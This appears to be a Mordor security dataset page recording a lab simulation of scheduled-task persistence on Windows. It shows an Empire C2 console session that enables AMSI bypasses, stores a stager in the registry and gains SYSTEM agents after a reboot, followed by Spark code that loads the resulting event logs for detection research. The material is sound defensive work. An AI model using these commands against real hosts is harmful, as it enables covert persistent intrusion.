Empire Elevated Scheduled Tasks

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/09/21

Modification Date

2020/09/21

Tactics

['TA0003']

Techniques

['T1053.005']

Tags

['Local Scheduled Tasks']

Dataset Description

This dataset represents adversaries creating and/or executing local scheduled tasks to maintain persistence in an environment.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author    Name    Link

Simulation Plan

Environment     Tool Type    Module
Mordor shire    C2           schtasks

Adversary View

(Empire: agents) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------          
5LKFT4WY ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         7172   5/0.0    2020-09-21 21:28:46  http            
M43EPU58 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5088   5/0.0    2020-09-21 21:43:06  http
4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         4092   5/0.0    2020-09-21 21:57:21  http

(Empire: agents) > interact 4SUZ8X62
(Empire: 4SUZ8X62) > usemodule persistence/elevated/schtasks*
(Empire: powershell/persistence/elevated/schtasks) > set AMSIBypass2 True
(Empire: powershell/persistence/elevated/schtasks) > set TaskName MordorElevated
(Empire: powershell/persistence/elevated/schtasks) > info

              Name: Invoke-Schtasks
            Module: powershell/persistence/elevated/schtasks
        NeedsAdmin: True
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @mattifestation
  @harmj0y

Description:
  Persist a stager (or script) using schtasks running as
  SYSTEM. This has a moderate detection/removal rating.

Comments:
  https://github.com/mattifestation/PowerSploit/blob/master/Pe
  rsistence/Persistence.psm1

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        4SUZ8X62                  Agent to run module on.                 
  Listener         False       http                      Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       True                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  DailyTime        False                                 Daily time to trigger the script        
                                                        (HH:mm).                                
  IdleTime         False                                 User idle time (in minutes) to trigger  
                                                        script.                                 
  OnLogon          False       True                      Switch. Trigger script on user logon.   
  TaskName         True        MordorElevated            Name to use for the schtask.            
  RegPath          False       HKLM:\Software\Microsoft  Registry location to store the script   
                              \Network\debug            code. Last element is the key name.     
  ADSPath          False                                 Alternate-data-stream location to store 
                                                        the script code.                        
  ExtFile          False                                 Use an external file for the payload    
                                                        instead of a stager.                    
  Cleanup          False                                 Switch. Cleanup the trigger and any     
                                                        script from specified location.         
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/persistence/elevated/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 4SUZ8X62 to run TASK_CMD_WAIT
[*] Agent 4SUZ8X62 tasked with task ID 1
[*] Tasked agent 4SUZ8X62 to run module powershell/persistence/elevated/schtasks
(Empire: powershell/persistence/elevated/schtasks) > 
SUCCESS: The scheduled task "MordorElevated" has successfully been created.
Schtasks persistence established using listener http stored in HKLM:\Software\Microsoft\Network\debug with MordorElevated OnLogon trigger.

(Empire: powershell/persistence/elevated/schtasks) > back
(Empire: 4SUZ8X62) > shell shutdown /r
[*] Tasked 4SUZ8X62 to run TASK_SHELL
[*] Agent 4SUZ8X62 tasked with task ID 2
(Empire: 4SUZ8X62) > 
..Command execution completed.

[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5

[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent Y2ADR48N checked in
[*] New agent D43KCT91 checked in
[+] Initial agent Y2ADR48N from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to Y2ADR48N at 172.18.39.5
[+] Initial agent D43KCT91 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to D43KCT91 at 172.18.39.5

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------          
5LKFT4WY ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         7172   5/0.0    2020-09-21 21:28:46  http            
M43EPU58 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5088   5/0.0    2020-09-21 21:43:06  http
4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http
Y2ADR48N ps 172.18.39.5     WORKSTATION5      *THESHIRE\SYSTEM        powershell         620    5/0.0    2020-09-21 22:01:50  http            
D43KCT91 ps 172.18.39.5     WORKSTATION5      *THESHIRE\SYSTEM        powershell         636    5/0.0    2020-09-21 22:01:51  http            

(Empire: agents) > 

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/empire_schtasks_creation_execution_elevated_user.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname                   |Channel                             |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |11898|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |8840 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |7645 |
|WORKSTATION5.theshire.local|security                            |4658   |4177 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |3114 |
|WORKSTATION5.theshire.local|security                            |5447   |2645 |
|WORKSTATION5.theshire.local|security                            |4656   |2142 |
|WORKSTATION5.theshire.local|security                            |4690   |2055 |
|WORKSTATION5.theshire.local|security                            |5154   |1798 |
|WORKSTATION5.theshire.local|security                            |5158   |1461 |
|WORKSTATION5.theshire.local|security                            |4663   |1384 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |1248 |
|WORKSTATION5.theshire.local|security                            |4703   |1048 |
|MORDORDC.theshire.local    |Security                            |4658   |846  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |623  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|11     |525  |
|WORKSTATION5.theshire.local|security                            |5156   |479  |
|MORDORDC.theshire.local    |Security                            |4690   |418  |
|MORDORDC.theshire.local    |Security                            |4656   |418  |
|MORDORDC.theshire.local    |Security                            |4663   |401  |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows